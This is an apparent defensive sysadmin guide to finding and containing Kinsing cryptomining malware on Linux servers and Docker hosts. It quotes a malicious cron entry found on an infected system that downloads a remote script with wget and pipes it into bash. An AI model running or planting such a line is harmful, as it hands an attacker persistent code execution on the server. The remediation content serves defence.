Kinsing – Malware based on Golang, works as an agent. The main purpose of this malware is to extract cryptocurrency on a compromised server. It spreads by exploiting a flaw in the configuration of services that are accessible from the outside.
Malware can add tasks to the task scheduler cronto be able to reconnect, for example after a server reboot.
How to determine if your server is being used for mining by Kinsing malware?
Identify the processes that are using CPU resources using the top or htop task manager. As a result, you will see, for example, the following processes: kdevtmpfsi, kinsing or dbusedthat make the most of all processor resources.
Kill processes by sending a signal KILL you cannot, as they will start again over time.
You can try to find tasks in the user task scheduler:
For example, the user has confluence a task has been found that allows you to download a script from a remote host using wget:
* * * * * wget -q -O - http://220.127.116.11/cf.sh | bash > /dev/null 2>&1
To prevent the user from using the scheduler, we can disable the service crond or add attribute immutable for the file. (immutable indicates that the file is protected from changes: cannot be deleted or renamed, no (hard) link can be created to this file, no data can be written to the file.)
echo > /var/spool/cron/confluence && chattr +i /var/spool/cron/confluence
It is also worth checking the files with user variables for unnecessary scripts and, if possible, delete them and add the immutable attribute.
Another solution is to block outgoing traffic, for example, if the malware uses Docker containers.
It is more difficult to find the malware process in containers, but we can determine where the container is accessing using the utility iptstate on the Docker host.
Search for container ID:
Search for container IP:
docker inspect CONTAINER_ID | grep -i ip
We look at the connections from the container’s IP address:
iptstate -s CONTAINER_IP
We block requests of the container via the HTTP protocol:
iptables -A DOCKER-USER -s 172.18.0.7/32 -p tcp -m tcp --dport 80 -j DROP
All of the above is a temporary solution to restrict the miner’s work. Keep your software up to date and devote time to information security issues.